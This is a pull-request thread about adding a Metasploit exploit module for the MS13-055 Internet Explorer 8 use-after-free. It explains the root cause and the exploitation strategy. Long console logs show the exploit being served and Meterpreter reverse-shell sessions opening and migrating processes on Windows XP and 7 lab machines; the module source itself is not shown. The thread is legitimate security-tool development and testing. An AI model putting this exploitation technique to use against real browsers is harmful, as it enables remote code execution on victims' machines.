Add MS13-055 Internet Explorer Use-After-Free Vulnerability

[wchen-r7]

In IE8 standards mode, it's possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement's outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it's trying to make a call to the object's SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take advantage of this by first creating an CAnchorElement object, let it free, and then replace the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user.

This bug is specific to Internet Explorer 8 only. It was originally discovered by Orange Tsai at Hitcon 2013, but was silently patched in the July 2013 update, so no CVE as of now.

Special thanks to Peter Vreugdenhil for the involvement.

Demo against XP & Win 7:

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/urQeWe
[*]  Local IP: http://10.0.1.76:8080/urQeWe
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 10.0.1.76        ms13_055_canchor - Using msvcrt ROP
[*] 10.0.1.76        ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:55279) at 2013-09-08 20:00:57 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.76:55279) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 496
[+] Successfully migrated to process 
[*] 10.0.1.79        ms13_055_canchor - Using JRE ROP
[*] 10.0.1.79        ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.79:49169) at 2013-09-08 20:01:11 -0500
[*] Session ID 2 (10.0.1.76:4444 -> 10.0.1.79:49169) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3544)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 832
[+] Successfully migrated to process 

msf exploit(ms13_055_canchor) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  WEI-3B699B1A81A\Administrator @ WEI-3B699B1A81A  10.0.1.76:4444 -> 10.0.1.76:55279 (10.0.1.76)
  2   meterpreter x86/win32  WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM         10.0.1.76:4444 -> 10.0.1.79:49169 (10.0.1.79)

msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WEI-3B699B1A81A
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms13_055_canchor) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN-6NH0Q8CJQVM
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

[jvazquez-r7]

Processing...

[jvazquez-r7]

Is it using hard tabs still? Looks like yes on my editor :?

If yes, please, switch to soft tabs, also please switch this pr by using the instructions at:

https://github.com/rapid7/metasploit-framework/wiki/Indentation-Standards

If it isn't using hard tabs, then there is something weird on my editor configuration and I need to check :S sorry in that case

[jvazquez-r7]

Working on W7 / IE8:

msf exploit(ms13_055_canchor) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/5pyCaX2LWDVO
[*]  Local IP: http://192.168.0.3:8080/5pyCaX2LWDVO
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using JRE ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51429) at 2013-09-09 08:09:20 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51429) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2520)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2984

msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > [+] Successfully migrated to process 
getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y

[jvazquez-r7]

Looks like it shouldn't be needed because get_payload() is adding the stack adjustment code by itself

[jvazquez-r7]

Thanks! Processing again!

[jvazquez-r7]

Tested on XP SP3 and Win 7 SP1:

msf exploit(ms13_055_canchor) > [*] Current server process: iexplore.exe (288)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3996
sessions -i 1
[*] Starting interaction with 1...

meterpreter > g[+] Successfully migrated to process 
etuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.219 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(ms13_055_canchor) > 
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:54000) at 2013-09-09 11:02:54 -0500
[*] Session ID 2 (192.168.0.3:4444 -> 192.168.0.3:54000) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1524)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3480
[+] Successfully migrated to process 

msf exploit(ms13_055_canchor) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > 

Some reliability issues with XP SP3 on first shots, did several tests, and looks good enough for me to go:

msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 3 opened (192.168.0.3:4444 -> 192.168.0.3:54020) at 2013-09-09 11:05:42 -0500
[*] Session ID 3 (192.168.0.3:4444 -> 192.168.0.3:54020) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3396)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3908
[+] Successfully migrated to process 
[*] 192.168.0.3 - Meterpreter session 3 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 4 opened (192.168.0.3:4444 -> 192.168.0.3:54022) at 2013-09-09 11:05:57 -0500
[*] Session ID 4 (192.168.0.3:4444 -> 192.168.0.3:54022) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3992)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2628
[+] Successfully migrated to process 
[*] 192.168.0.3 - Meterpreter session 4 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 5 opened (192.168.0.3:4444 -> 192.168.0.3:54025) at 2013-09-09 11:06:13 -0500
[*] Session ID 5 (192.168.0.3:4444 -> 192.168.0.3:54025) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2240)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3492

msf exploit(ms13_055_canchor) > j[+] Successfully migrated to process 
obs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(ms13_055_canchor) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/eiJLfQ1IYj
[*]  Local IP: http://192.168.0.3:8080/eiJLfQ1IYj
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3 - Meterpreter session 5 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 6 opened (192.168.0.3:4444 -> 192.168.0.3:54037) at 2013-09-09 11:08:00 -0500
[*] Session ID 6 (192.168.0.3:4444 -> 192.168.0.3:54037) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3144)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1576
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B ## Because I killed the session
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] 192.168.0.3 - Meterpreter session 6 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 7 opened (192.168.0.3:4444 -> 192.168.0.3:54042) at 2013-09-09 11:08:13 -0500
[*] Session ID 7 (192.168.0.3:4444 -> 192.168.0.3:54042) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3752)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2904
[+] Successfully migrated to process 

landing

[yenteasy]

well i have been taking a look on https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf and this stack trace sounds familiar for me: CVE-2013-3163. A bug discovered and reported on Oct, 2012. So it was not silently patched and has its cve :)

Nice exploit btw ;)

[wchen-r7]

Thanks yenteasy! I'm glad you told me this, because it was really painful to verify the actual CVE. Nobody else knows for sure which one. I will do another pull request to update the module, thanks!

[yenteasy]

You're welcome. yea, that's right, since MS is using the same title (memory corruption) for all the bugs.
By the way, i will send you a copy of my POC by mail on this weekend if you want a full verification.

Regards,
Jose.

[wchen-r7]

That'd be great. Please feel free to e-mail to either wei_chen[at].rapid7.com, or sinn3r[at]metasploit.com. Thanks!